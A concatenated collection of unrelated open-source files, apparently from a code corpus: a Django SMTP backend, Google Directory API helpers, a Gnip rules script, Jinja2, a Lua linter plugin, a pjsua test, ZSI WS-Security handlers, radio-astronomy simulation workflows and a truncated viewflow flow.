uccgit/the-game | refs/heads/sandbox | src/Menu/__init__.py | 7 | __author__ = 'tootall'
|
pasqualguerrero/django | refs/heads/master | django/core/mail/backends/smtp.py | 477 | """SMTP email backend class."""
import smtplib
import ssl
import threading
from django.conf import settings
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address
from django.core.mail.utils import DNS_NAME
class EmailBackend(BaseEmailBackend):
"""
A wrapper that manages the SMTP network connection.
"""
def __init__(self, host=None, port=None, username=None, password=None,
use_tls=None, fail_silently=False, use_ssl=None, timeout=None,
ssl_keyfile=None, ssl_certfile=None,
**kwargs):
super(EmailBackend, self).__init__(fail_silently=fail_silently)
self.host = host or settings.EMAIL_HOST
self.port = port or settings.EMAIL_PORT
self.username = settings.EMAIL_HOST_USER if username is None else username
self.password = settings.EMAIL_HOST_PASSWORD if password is None else password
self.use_tls = settings.EMAIL_USE_TLS if use_tls is None else use_tls
self.use_ssl = settings.EMAIL_USE_SSL if use_ssl is None else use_ssl
self.timeout = settings.EMAIL_TIMEOUT if timeout is None else timeout
self.ssl_keyfile = settings.EMAIL_SSL_KEYFILE if ssl_keyfile is None else ssl_keyfile
self.ssl_certfile = settings.EMAIL_SSL_CERTFILE if ssl_certfile is None else ssl_certfile
if self.use_ssl and self.use_tls:
raise ValueError(
"EMAIL_USE_TLS/EMAIL_USE_SSL are mutually exclusive, so only set "
"one of those settings to True.")
self.connection = None
self._lock = threading.RLock()
def open(self):
"""
Ensures we have a connection to the email server. Returns whether or
not a new connection was required (True or False).
"""
if self.connection:
# Nothing to do if the connection is already open.
return False
connection_class = smtplib.SMTP_SSL if self.use_ssl else smtplib.SMTP
# If local_hostname is not specified, socket.getfqdn() gets used.
# For performance, we use the cached FQDN for local_hostname.
connection_params = {'local_hostname': DNS_NAME.get_fqdn()}
if self.timeout is not None:
connection_params['timeout'] = self.timeout
if self.use_ssl:
connection_params.update({
'keyfile': self.ssl_keyfile,
'certfile': self.ssl_certfile,
})
try:
self.connection = connection_class(self.host, self.port, **connection_params)
# TLS/SSL are mutually exclusive, so only attempt TLS over
# non-secure connections.
if not self.use_ssl and self.use_tls:
self.connection.ehlo()
self.connection.starttls(keyfile=self.ssl_keyfile, certfile=self.ssl_certfile)
self.connection.ehlo()
if self.username and self.password:
self.connection.login(self.username, self.password)
return True
except smtplib.SMTPException:
if not self.fail_silently:
raise
def close(self):
"""Closes the connection to the email server."""
if self.connection is None:
return
try:
try:
self.connection.quit()
except (ssl.SSLError, smtplib.SMTPServerDisconnected):
# This happens when calling quit() on a TLS connection
# sometimes, or when the connection was already disconnected
# by the server.
self.connection.close()
except smtplib.SMTPException:
if self.fail_silently:
return
raise
finally:
self.connection = None
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
if not email_messages:
return
with self._lock:
new_conn_created = self.open()
if not self.connection:
# We failed silently on open().
# Trying to send would be pointless.
return
num_sent = 0
for message in email_messages:
sent = self._send(message)
if sent:
num_sent += 1
if new_conn_created:
self.close()
return num_sent
def _send(self, email_message):
"""A helper method that does the actual sending."""
if not email_message.recipients():
return False
from_email = sanitize_address(email_message.from_email, email_message.encoding)
recipients = [sanitize_address(addr, email_message.encoding)
for addr in email_message.recipients()]
message = email_message.message()
try:
self.connection.sendmail(from_email, recipients, message.as_bytes(linesep='\r\n'))
except smtplib.SMTPException:
if not self.fail_silently:
raise
return False
return True
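# Hedged usage sketch (editor's addition; host and addresses are hypothetical).
# send_messages() opens the connection once, reuses it for every message in the
# list, and closes it only if it created it:
#
#   from django.core.mail import EmailMessage, get_connection
#   conn = get_connection('django.core.mail.backends.smtp.EmailBackend',
#                         host='smtp.example.com', port=587, use_tls=True)
#   msgs = [EmailMessage('subject', 'body', 'me@example.com', ['you@example.com'])]
#   conn.send_messages(msgs)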
|
adhintz/password-alert | refs/heads/master | server/google_directory_service.py | 2 | # Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to interact with Google Directory API."""
import logging
from apiclient.discovery import build
import config
import datastore
import httplib2
from oauth2client import appengine
from oauth2client.client import AccessTokenRefreshError
import setup
from google.appengine.api import memcache
from google.appengine.ext import ndb
API_SERVICE_NAME = 'admin'
DIRECTORY_API_VERSION = 'directory_v1'
MEMCACHE_ADMIN_KEY = 'admins'
MEMCACHE_EXPIRATION_TIME_IN_SECONDS = 600
class SetupNeeded(Exception):
pass
def _GetAuthorizedHttp(credentials=None):
"""Get the authorized http from the stored credentials.
The client library will validate and refresh credentials as needed.
Args:
credentials: Optional credentials to use instead of any in the datastore.
Returns:
authorized http, a "httplib2.Http" instance, with the proper authentication
header, access token, and credential.
Raises:
    SetupNeeded: Raised when there are no credentials in the datastore.
"""
if not credentials:
credential_storage = appengine.StorageByKeyName(
appengine.CredentialsModel,
datastore.CURRENT_DOMAIN,
'credentials')
credentials = credential_storage.get()
if credentials:
logging.debug('Successfully got credentials from storage.')
else:
if config.SERVICE_ACCOUNT:
credentials = setup.LoadCredentialsFromPem()
else:
raise SetupNeeded('Credentials not in storage')
return credentials.authorize(httplib2.Http())
def BuildService(credentials=None):
"""Build the directory api service.
Args:
credentials: Optional credentials to use instead of any in the datastore.
Returns:
service object for interacting with the directory api
Raises:
    Exception: Raised when the PEM file content is not valid.
"""
try:
return build(
serviceName=API_SERVICE_NAME,
version=DIRECTORY_API_VERSION,
http=_GetAuthorizedHttp(credentials))
except NotImplementedError:
ndb.Key('CredentialsModel', datastore.CURRENT_DOMAIN).delete()
raise Exception('The service account credentials are invalid. '
'Check to make sure you have a valid PEM file and you '
'have removed any extra data attributes that may have '
'been written to the PEM file when converted from '
'PKCS12. The existing PEM key has been revoked and '
'needs to be updated with a new valid key.')
def _GetAdminEmails():
"""Get the emails of the members of the admin group.
Returns:
admin_emails: Emails of the members of the admin group.
"""
admin_emails = []
admin_group_info = BuildService().members().list(
groupKey=datastore.Setting.get('admin_group')).execute()
for member in admin_group_info['members']:
admin_emails.append(member['email'])
memcache.set(datastore.CURRENT_DOMAIN + ':' + MEMCACHE_ADMIN_KEY,
admin_emails,
MEMCACHE_EXPIRATION_TIME_IN_SECONDS)
return admin_emails
def IsInAdminGroup(user):
"""Determine if the user is a member of the admin group.
The memcache will be checked first. If not in memcache, we will then
make the api call, and then save into memcache for future use.
Args:
user: appengine user object
Returns:
boolean: True if user is a member of the admin group. False otherwise.
Raises:
Exception: If ADMIN_GROUP is not configured in config.py
SetupNeeded: If oauth token no longer works.
"""
try:
user_info = GetUserInfo(user.email())
except AccessTokenRefreshError:
ndb.Key('CredentialsModel', datastore.CURRENT_DOMAIN).delete()
raise SetupNeeded('oauth token no longer valid')
# TODO(adhintz) memcache this isAdmin check.
if user_info.get('isAdmin', '') or user_info.get('isDelegatedAdmin', ''):
logging.info('user is a domain admin')
return True
logging.debug('Checking if %s is in admin group.', user.nickname())
if not datastore.Setting.get('admin_group'):
raise Exception('You must configure ADMIN_GROUP in config.py')
cached_admin_emails = memcache.get(
datastore.CURRENT_DOMAIN + ':' + MEMCACHE_ADMIN_KEY)
if cached_admin_emails is not None:
logging.debug('Admin info is found in memcache.')
if user.email() in cached_admin_emails:
return True
else:
return False
logging.debug('Admin info is not found in memcache.')
if user.email() in _GetAdminEmails():
return True
return False
def GetUserInfo(user_email):
"""Get the user info.
Args:
user_email: String of the user email.
Returns:
user_info: A dictionary of the user's domain info.
"""
logging.debug('Getting domain info for %s.', user_email)
user_info = BuildService().users().get(userKey=user_email).execute()
return user_info
def UpdateUserInfo(user_email, new_user_info):
"""Updates the user info.
Args:
user_email: String of the user email.
new_user_info: A dictionary of the user's new domain info to be updated.
"""
logging.debug('Updating domain info for %s.', user_email)
BuildService().users().update(
userKey=user_email, body=new_user_info).execute()
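# Hedged usage sketch (editor's addition; the address and the 'suspended'
# attribute are illustrative Directory API fields):
#
#   info = GetUserInfo('alice@example.com')
#   info['suspended'] = False
#   UpdateUserInfo('alice@example.com', info)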
|
huxianglin/pythonstudy | refs/heads/master | week06-胡湘林/选课系统/bin/admin.py | 1 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Provides admin users with related operations, such as managing schools, courses, and teachers.
"""
import os
import sys
BASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(BASEDIR)
from src.service import admin_service
def execute():
admin_service.main()
if __name__ == '__main__':
execute()
|
gnip/support | refs/heads/master | Rules API/Python/AddRule.py | 1 | #!/usr/bin/env python
import urllib2
import base64
import json
import xml
import sys
def post():
# Expected Premium Stream URL Format:
# https://api.gnip.com:443/accounts/<account>/publishers/<publisher>/streams/<stream>/<label>/rules.json
url = 'ENTER_RULES_API_URL_HERE'
UN = 'ENTER_USERNAME_HERE'
PWD = 'ENTER_PASSWORD_HERE'
rule = 'testRule'
tag = 'testTag'
values = '{"rules": [{"value":"' + rule + '","tag":"' + tag + '"}]}'
base64string = base64.encodestring('%s:%s' % (UN, PWD)).replace('\n', '')
req = urllib2.Request(url=url, data=values)
req.add_header('Content-type', 'application/json')
req.add_header("Authorization", "Basic %s" % base64string)
    try:
        response = urllib2.urlopen(req)
        the_page = response.read()
        print the_page
    except urllib2.HTTPError as e:
        # editor's fix: 'response' is never bound when urlopen fails,
        # so read and print the error body here instead
        print e.read()
if __name__ == "__main__":
post()
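# Editor's note (hedged): the hand-built 'values' string above serializes to
#   {"rules": [{"value":"testRule","tag":"testTag"}]}
# json.dumps (already imported) would build the same body more robustly:
#   values = json.dumps({"rules": [{"value": rule, "tag": tag}]})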
|
csrgxtu/Google-Slave | refs/heads/master | src/GAE-Slave/lib/jinja2/__init__.py | 256 | # -*- coding: utf-8 -*-
"""
jinja2
~~~~~~
Jinja2 is a template engine written in pure Python. It provides a
Django inspired non-XML syntax but supports inline expressions and
an optional sandboxed environment.
Nutshell
--------
Here a small example of a Jinja2 template::
{% extends 'base.html' %}
{% block title %}Memberlist{% endblock %}
{% block content %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
__docformat__ = 'restructuredtext en'
__version__ = '2.7.3'
# high level interface
from jinja2.environment import Environment, Template
# loaders
from jinja2.loaders import BaseLoader, FileSystemLoader, PackageLoader, \
DictLoader, FunctionLoader, PrefixLoader, ChoiceLoader, \
ModuleLoader
# bytecode caches
from jinja2.bccache import BytecodeCache, FileSystemBytecodeCache, \
MemcachedBytecodeCache
# undefined types
from jinja2.runtime import Undefined, DebugUndefined, StrictUndefined
# exceptions
from jinja2.exceptions import TemplateError, UndefinedError, \
TemplateNotFound, TemplatesNotFound, TemplateSyntaxError, \
TemplateAssertionError
# decorators and public utilities
from jinja2.filters import environmentfilter, contextfilter, \
evalcontextfilter
from jinja2.utils import Markup, escape, clear_caches, \
environmentfunction, evalcontextfunction, contextfunction, \
is_undefined
__all__ = [
'Environment', 'Template', 'BaseLoader', 'FileSystemLoader',
'PackageLoader', 'DictLoader', 'FunctionLoader', 'PrefixLoader',
'ChoiceLoader', 'BytecodeCache', 'FileSystemBytecodeCache',
'MemcachedBytecodeCache', 'Undefined', 'DebugUndefined',
'StrictUndefined', 'TemplateError', 'UndefinedError', 'TemplateNotFound',
'TemplatesNotFound', 'TemplateSyntaxError', 'TemplateAssertionError',
'ModuleLoader', 'environmentfilter', 'contextfilter', 'Markup', 'escape',
'environmentfunction', 'contextfunction', 'clear_caches', 'is_undefined',
'evalcontextfilter', 'evalcontextfunction'
]
|
danalec/dotfiles | refs/heads/master | sublime/.config/sublime-text-3/Packages/SublimeLinter-contrib-lua-globals/linter.py | 2 | #
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Patrick Kish
# Copyright (c) 2014 Patrick Kish
#
# License: MIT
#
"""This module exports the LuaGlobals plugin class."""
from os.path import dirname, join, realpath
FOLDER_PATH = dirname(realpath(__file__))
from SublimeLinter.lint import Linter
class LuaGlobals(Linter):
"""Provides an interface to lua-globals."""
syntax = 'lua'
script_path = join(FOLDER_PATH, 'findglobals.lua')
cmd = 'lua "' + script_path + '" "@"'
regex = (
r'\s*\[(?P<line>\d+)\]\s+'
r'((?P<warning>G:)|(?P<error>S:))'
r'(?P<message>.+?(?::\s(?P<near>.*)|$))'
)
tempfile_suffix = "lua"
|
DouglasHeriot/pjproject | refs/heads/master | tests/pjsua/scripts-run/200_register.py | 42 | # $Id$
#
from inc_cfg import *
# Basic registration
test_param = TestParam(
"Basic registration",
[
InstanceParam( "client",
"--null-audio"+
" --id=\"<sip:test1@pjsip.org>\""+
" --registrar=sip:sip.pjsip.org" +
" --username=test1" +
" --password=test1" +
" --realm=*",
uri="sip:test1@pjsip.org",
have_reg=True),
]
)
|
sassoftware/catalog-service | refs/heads/master | catalogService/libs/viclient_vendor/ZSI/twisted/WSsecurity.py | 3 | ###########################################################################
# Joshua R. Boverhof, LBNL
# See Copyright for copyright notice!
# $Id: WSsecurity.py 1134 2006-02-24 00:23:06Z boverhof $
###########################################################################
import sys, time, warnings
import sha, base64
# twisted & related imports
from zope.interface import classProvides, implements, Interface
from twisted.python import log, failure
from twisted.web.error import NoResource
from twisted.web.server import NOT_DONE_YET
from twisted.internet import reactor
import twisted.web.http
import twisted.web.resource
# ZSI imports
from ZSI import _get_element_nsuri_name, EvaluateException, ParseException
from ZSI.parse import ParsedSoap
from ZSI.writer import SoapWriter
from ZSI.TC import _get_global_element_declaration as GED
from ZSI import fault
from ZSI.wstools.Namespaces import OASIS, DSIG
# Editor's addition (assumption): Canonicalize and XPath are referenced below but
# never imported; ZSI.wstools.c14n and PyXML's xpath package are the likely sources.
from ZSI.wstools.c14n import Canonicalize
from xml import xpath as XPath
from WSresource import DefaultHandlerChain, HandlerChainInterface,\
WSAddressCallbackHandler, DataHandler, WSAddressHandler
#
# Global Element Declarations
#
UsernameTokenDec = GED(OASIS.WSSE, "UsernameToken")
SecurityDec = GED(OASIS.WSSE, "Security")
SignatureDec = GED(DSIG.BASE, "Signature")
PasswordDec = GED(OASIS.WSSE, "Password")
NonceDec = GED(OASIS.WSSE, "Nonce")
CreatedDec = GED(OASIS.UTILITY, "Created")
if None in [UsernameTokenDec,SecurityDec,SignatureDec,PasswordDec,NonceDec,CreatedDec]:
raise ImportError, 'required global element(s) unavailable: %s ' %({
(OASIS.WSSE, "UsernameToken"):UsernameTokenDec,
(OASIS.WSSE, "Security"):SecurityDec,
(DSIG.BASE, "Signature"):SignatureDec,
(OASIS.WSSE, "Password"):PasswordDec,
(OASIS.WSSE, "Nonce"):NonceDec,
(OASIS.UTILITY, "Created"):CreatedDec,
})
#
# Stability: Unstable, Untested, Not Finished.
#
class WSSecurityHandler:
"""Web Services Security: SOAP Message Security 1.0
Class Variables:
debug -- If True provide more detailed SOAP:Fault information to clients.
"""
classProvides(HandlerChainInterface)
debug = True
@classmethod
def processRequest(cls, ps, **kw):
if type(ps) is not ParsedSoap:
raise TypeError,'Expecting ParsedSoap instance'
security = ps.ParseHeaderElements([cls.securityDec])
# Assume all security headers are supposed to be processed here.
for pyobj in security or []:
for any in pyobj.Any or []:
if any.typecode is UsernameTokenDec:
try:
ps = cls.UsernameTokenProfileHandler.processRequest(ps, any)
except Exception, ex:
if cls.debug: raise
raise RuntimeError, 'Unauthorized Username/passphrase combination'
continue
if any.typecode is SignatureDec:
try:
ps = cls.SignatureHandler.processRequest(ps, any)
except Exception, ex:
if cls.debug: raise
raise RuntimeError, 'Invalid Security Header'
continue
raise RuntimeError, 'WS-Security, Unsupported token %s' %str(any)
return ps
@classmethod
def processResponse(cls, output, **kw):
return output
class UsernameTokenProfileHandler:
"""Web Services Security UsernameToken Profile 1.0
Class Variables:
targetNamespace --
"""
classProvides(HandlerChainInterface)
# Class Variables
targetNamespace = OASIS.WSSE
sweepInterval = 60*5
nonces = None
# Set to None to disable
PasswordText = targetNamespace + "#PasswordText"
PasswordDigest = targetNamespace + "#PasswordDigest"
        # Override passwordCallback. Editor's fix: wrapped in classmethod so that
        # cls.passwordCallback(username) works under Python 2.
        passwordCallback = classmethod(lambda cls, username: None)
@classmethod
def sweep(cls, index):
"""remove nonces every sweepInterval.
Parameters:
index -- remove all nonces up to this index.
"""
if cls.nonces is None:
cls.nonces = []
seconds = cls.sweepInterval
cls.nonces = cls.nonces[index:]
reactor.callLater(seconds, cls.sweep, len(cls.nonces))
@classmethod
def processRequest(cls, ps, token, **kw):
"""
Parameters:
ps -- ParsedSoap instance
token -- UsernameToken pyclass instance
"""
if token.typecode is not UsernameTokenDec:
raise TypeError, 'expecting GED (%s,%s) representation.' %(
UsernameTokenDec.nspname, UsernameTokenDec.pname)
username = token.Username
# expecting only one password
# may have a nonce and a created
password = nonce = timestamp = None
for any in token.Any or []:
if any.typecode is PasswordDec:
password = any
continue
                if any.typecode is NonceDec:
                    nonce = any
                    continue
                if any.typecode is CreatedDec:
timestamp = any
continue
raise TypeError, 'UsernameTokenProfileHander unexpected %s' %str(any)
if password is None:
raise RuntimeError, 'Unauthorized, no password'
# TODO: not yet supporting complexType simpleContent in pyclass_type
attrs = getattr(password, password.typecode.attrs_aname, {})
pwtype = attrs.get('Type', cls.PasswordText)
# Clear Text Passwords
if cls.PasswordText is not None and pwtype == cls.PasswordText:
if password == cls.passwordCallback(username):
return ps
raise RuntimeError, 'Unauthorized, clear text password failed'
if cls.nonces is None: cls.sweep(0)
if nonce is not None:
if nonce in cls.nonces:
raise RuntimeError, 'Invalid Nonce'
# created was 10 seconds ago or sooner
                if timestamp is not None and timestamp < time.gmtime(time.time()-10):
raise RuntimeError, 'UsernameToken created is expired'
cls.nonces.append(nonce)
# PasswordDigest, recommended that implemenations
# require a Nonce and Created
if cls.PasswordDigest is not None and pwtype == cls.PasswordDigest:
digest = sha.sha()
                for i in (nonce, timestamp, cls.passwordCallback(username)):
if i is None: continue
digest.update(i)
if password == base64.encodestring(digest.digest()).strip():
return ps
raise RuntimeError, 'Unauthorized, digest failed'
raise RuntimeError, 'Unauthorized, contents of UsernameToken unknown'
@classmethod
def processResponse(cls, output, **kw):
return output
@staticmethod
def hmac_sha1(xml):
return
class SignatureHandler:
"""Web Services Security UsernameToken Profile 1.0
"""
digestMethods = {
DSIG.BASE+"#sha1":sha.sha,
}
signingMethods = {
DSIG.BASE+"#hmac-sha1":hmac_sha1,
}
canonicalizationMethods = {
DSIG.C14N_EXCL:lambda node: Canonicalize(node, unsuppressedPrefixes=[]),
DSIG.C14N:lambda node: Canonicalize(node),
}
@classmethod
def processRequest(cls, ps, signature, **kw):
"""
Parameters:
ps -- ParsedSoap instance
signature -- Signature pyclass instance
"""
            if signature.typecode is not SignatureDec:
raise TypeError, 'expecting GED (%s,%s) representation.' %(
SignatureDec.nspname, SignatureDec.pname)
si = signature.SignedInfo
si.CanonicalizationMethod
calgo = si.CanonicalizationMethod.get_attribute_Algorithm()
for any in si.CanonicalizationMethod.Any:
pass
# Check Digest
si.Reference
            context = XPath.Context.Context(ps.dom, processorNss={'wsu':OASIS.UTILITY})  # editor's fix (assumption): PyXML's Context takes processorNss, not processContents
exp = XPath.Compile('//*[@wsu:Id="%s"]' %si.Reference.get_attribute_URI())
nodes = exp.evaluate(context)
if len(nodes) != 1:
raise RuntimeError, 'A SignedInfo Reference must refer to one node %s.' %(
si.Reference.get_attribute_URI())
            try:
                xml = cls.canonicalizationMethods[calgo](nodes[0])
            except KeyError:
                raise RuntimeError, 'Unsupported canonicalization algorithm'
            try:
                # editor's fix (assumption): the digest algorithm is declared on the
                # Reference element; 'salgo' was used here before being defined
                dalgo = si.Reference.DigestMethod.get_attribute_Algorithm()
                digest = cls.digestMethods[dalgo]
            except KeyError:
                raise RuntimeError, 'unknown digest method Algorithm'
digestValue = base64.encodestring(digest(xml).digest()).strip()
if si.Reference.DigestValue != digestValue:
raise RuntimeError, 'digest does not match'
if si.Reference.Transforms:
pass
signature.KeyInfo
signature.KeyInfo.KeyName
signature.KeyInfo.KeyValue
signature.KeyInfo.RetrievalMethod
signature.KeyInfo.X509Data
signature.KeyInfo.PGPData
signature.KeyInfo.SPKIData
signature.KeyInfo.MgmtData
signature.KeyInfo.Any
signature.Object
# TODO: Check Signature
signature.SignatureValue
si.SignatureMethod
salgo = si.SignatureMethod.get_attribute_Algorithm()
if si.SignatureMethod.HMACOutputLength:
pass
for any in si.SignatureMethod.Any:
pass
# <SignedInfo><Reference URI="">
exp = XPath.Compile('//child::*[attribute::URI = "%s"]/..' %(
si.Reference.get_attribute_URI()))
nodes = exp.evaluate(context)
if len(nodes) != 1:
raise RuntimeError, 'A SignedInfo Reference must refer to one node %s.' %(
si.Reference.get_attribute_URI())
try:
                xml = cls.canonicalizationMethods[calgo](nodes[0])
            except KeyError:
raise RuntimeError, 'Unsupported canonicalization algorithm'
# TODO: Check SignatureValue
@classmethod
def processResponse(cls, output, **kw):
return output
class X509TokenProfileHandler:
"""Web Services Security UsernameToken Profile 1.0
"""
targetNamespace = DSIG.BASE
# Token Types
singleCertificate = targetNamespace + "#X509v3"
certificatePath = targetNamespace + "#X509PKIPathv1"
setCerticatesCRLs = targetNamespace + "#PKCS7"
@classmethod
def processRequest(cls, ps, signature, **kw):
return ps
"""
<element name="KeyInfo" type="ds:KeyInfoType"/>
<complexType name="KeyInfoType" mixed="true">
<choice maxOccurs="unbounded">
<element ref="ds:KeyName"/>
<element ref="ds:KeyValue"/>
<element ref="ds:RetrievalMethod"/>
<element ref="ds:X509Data"/>
<element ref="ds:PGPData"/>
<element ref="ds:SPKIData"/>
<element ref="ds:MgmtData"/>
<any processContents="lax" namespace="##other"/>
<!-- (1,1) elements from (0,unbounded) namespaces -->
</choice>
<attribute name="Id" type="ID" use="optional"/>
</complexType>
<element name="Signature" type="ds:SignatureType"/>
<complexType name="SignatureType">
<sequence>
<element ref="ds:SignedInfo"/>
<element ref="ds:SignatureValue"/>
<element ref="ds:KeyInfo" minOccurs="0"/>
<element ref="ds:Object" minOccurs="0" maxOccurs="unbounded"/>
</sequence>
<attribute name="Id" type="ID" use="optional"/>
</complexType>
<element name="SignatureValue" type="ds:SignatureValueType"/>
<complexType name="SignatureValueType">
<simpleContent>
<extension base="base64Binary">
<attribute name="Id" type="ID" use="optional"/>
</extension>
</simpleContent>
</complexType>
<!-- Start SignedInfo -->
<element name="SignedInfo" type="ds:SignedInfoType"/>
<complexType name="SignedInfoType">
<sequence>
<element ref="ds:CanonicalizationMethod"/>
<element ref="ds:SignatureMethod"/>
<element ref="ds:Reference" maxOccurs="unbounded"/>
</sequence>
<attribute name="Id" type="ID" use="optional"/>
</complexType>
"""
class WSSecurityHandlerChainFactory:
protocol = DefaultHandlerChain
@classmethod
def newInstance(cls):
return cls.protocol(WSAddressCallbackHandler, DataHandler,
WSSecurityHandler, WSAddressHandler())
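# Editor's sketch (hedged) of the PasswordDigest rule the UsernameToken handler
# enforces above: Base64(SHA-1(nonce + created + password)), with absent parts
# simply skipped.
def _password_digest(nonce, created, password):
    d = sha.sha()
    for part in (nonce, created, password):
        if part is not None:
            d.update(part)
    return base64.encodestring(d.digest()).strip()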
|
SKA-ScienceDataProcessor/algorithm-reference-library | refs/heads/master | workflows/serial/simulation/simulation_serial.py | 1 | """ Pipelines expressed as dask components
"""
import logging
import numpy
from astropy import units as u
from astropy.coordinates import SkyCoord
from data_models.polarisation import PolarisationFrame
from data_models.memory_data_models import Visibility, BlockVisibility
from wrappers.serial.calibration.operations import apply_gaintable, create_gaintable_from_blockvisibility
from wrappers.serial.simulation.testing_support import simulate_gaintable
from processing_components.simulation.configurations import create_named_configuration
from wrappers.serial.visibility.base import create_blockvisibility, create_visibility
from wrappers.serial.visibility.coalesce import convert_blockvisibility_to_visibility, \
convert_visibility_to_blockvisibility
log = logging.getLogger(__name__)
def simulate_list_serial_workflow(config='LOWBD2',
phasecentre=SkyCoord(ra=+15.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000'),
frequency=None, channel_bandwidth=None, times=None,
polarisation_frame=PolarisationFrame("stokesI"), order='frequency',
format='blockvis',
rmax=1000.0,
zerow=False):
""" A component to simulate an observation
The simulation step can generate a single BlockVisibility or a list of BlockVisibility's.
The parameter keyword determines the way that the list is constructed.
If order='frequency' then len(frequency) BlockVisibility's with all times are created.
If order='time' then len(times) BlockVisibility's with all frequencies are created.
If order = 'both' then len(times) * len(times) BlockVisibility's are created each with
a single time and frequency. If order = None then all data are created in one BlockVisibility.
The output format can be either 'blockvis' (for calibration) or 'vis' (for imaging)
:param config: Name of configuration: def LOWBDS-CORE
:param phasecentre: Phase centre def: SkyCoord(ra=+15.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000')
:param frequency: def [1e8]
:param channel_bandwidth: def [1e6]
:param times: Observing times in radians: def [0.0]
:param polarisation_frame: def PolarisationFrame("stokesI")
:param order: 'time' or 'frequency' or 'both' or None: def 'frequency'
:param format: 'blockvis' or 'vis': def 'blockvis'
:return: vis_list with different frequencies in different elements
"""
if format == 'vis':
create_vis = create_visibility
else:
create_vis = create_blockvisibility
if times is None:
times = [0.0]
if channel_bandwidth is None:
channel_bandwidth = [1e6]
if frequency is None:
frequency = [1e8]
conf = create_named_configuration(config, rmax=rmax)
if order == 'time':
log.debug("simulate_list_serial_workflow: Simulating distribution in %s" % order)
vis_list = list()
for i, time in enumerate(times):
vis_list.append(create_vis(conf, numpy.array([times[i]]),
frequency=frequency,
channel_bandwidth=channel_bandwidth,
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
elif order == 'frequency':
log.debug("simulate_list_serial_workflow: Simulating distribution in %s" % order)
vis_list = list()
for j, _ in enumerate(frequency):
vis_list.append(create_vis(conf, times,
frequency=numpy.array([frequency[j]]),
channel_bandwidth=numpy.array(
[channel_bandwidth[j]]),
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
elif order == 'both':
log.debug("simulate_list_serial_workflow: Simulating distribution in time and frequency")
vis_list = list()
for i, _ in enumerate(times):
for j, _ in enumerate(frequency):
vis_list.append(create_vis(conf, numpy.array([times[i]]),
frequency=numpy.array([frequency[j]]),
channel_bandwidth=numpy.array(
[channel_bandwidth[j]]),
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
elif order is None:
log.debug("simulate_list_serial_workflow: Simulating into single %s" % format)
vis_list = list()
vis_list.append(create_vis(conf, times, frequency=frequency,
channel_bandwidth=channel_bandwidth,
weight=1.0, phasecentre=phasecentre,
polarisation_frame=polarisation_frame,
zerow=zerow))
else:
raise NotImplementedError("order $s not known" % order)
return vis_list
def corrupt_list_serial_workflow(vis_list, gt_list=None, seed=None, **kwargs):
""" Create a graph to apply gain errors to a vis_list
:param vis_list:
:param gt_list: Optional gain table graph
:param kwargs:
:return:
"""
def corrupt_vis(vis, gt, **kwargs):
if isinstance(vis, Visibility):
bv = convert_visibility_to_blockvisibility(vis)
else:
bv = vis
if gt is None:
gt = create_gaintable_from_blockvisibility(bv, **kwargs)
gt = simulate_gaintable(gt, **kwargs)
bv = apply_gaintable(bv, gt)
if isinstance(vis, Visibility):
return convert_blockvisibility_to_visibility(bv)
else:
return bv
if gt_list is None:
return [corrupt_vis(vis_list[ivis], None, **kwargs)
for ivis, v in enumerate(vis_list)]
else:
return [corrupt_vis(vis_list[ivis], gt_list[ivis], **kwargs)
for ivis, v in enumerate(vis_list)]
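# Hedged usage sketch (editor's addition; configuration name and numbers are
# illustrative). With order='frequency' the workflow returns one
# BlockVisibility per channel:
#
#   frequency = numpy.linspace(0.8e8, 1.2e8, 5)
#   channel_bandwidth = numpy.array(5 * [1e7])
#   times = numpy.linspace(-3.0, 3.0, 7) * numpy.pi / 12.0
#   vis_list = simulate_list_serial_workflow('LOWBD2', frequency=frequency,
#                                            channel_bandwidth=channel_bandwidth,
#                                            times=times, order='frequency')
#   assert len(vis_list) == len(frequency)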
|
yuvalt/xbmc | refs/heads/master | lib/libUPnP/Platinum/Build/Tools/Scripts/MakeAllVs.py | 262 | #! /usr/bin/env python
import os
import sys
import getopt
import subprocess
configs = ['Debug', 'Release']
solutions = ['../../../Build/Targets/x86-microsoft-win32-vs2008/Platinum.sln']
try:
opts, args = getopt.getopt(sys.argv[1:], "b:rc")
except getopt.GetoptError, (msg, opt):
print 'No build_config, defaulting to build all'
for opt, arg in opts:
if opt == '-b':
config = arg
def CallVsMake(sln, cfg):
cmd = 'python VsMake.py -s %s -b %s' % (sln, cfg)
print cmd
retVal = subprocess.call(cmd.split())
if retVal != 0:
sys.exit(retVal)
for sln in solutions:
if 'config' not in locals() and 'config' not in globals():
print '************ Building all configurations **************'
for cfg in configs:
CallVsMake(sln, cfg)
else:
print '************ Building configuration=' + config + ' ****************'
CallVsMake(sln, config)
|
codingjoe/viewflow | refs/heads/master | tests/examples/customnode/flows.py | 3 | from viewflow import flow, views as flow_views
from viewflow.base import this, Flow
from . import models, views
from .nodes import DynamicSplit
class DynamicSplitFlow(Flow):
"""
Dynamic split
Depends on initial decision, several instances on make_decision task would be instantiated
"""
process_cls = models.DynamicSplitProcess
summary_template = """
Decision on: {{ process.question }}<br/>
{{ process.decision_set.count }} of {{ process.split_count }} completed
"""
start = flow.Start(flow_views.StartProcessView, fields=['question', 'split_count'],
task_result_summary="Asks for {{ process.split_count }} decisions") \
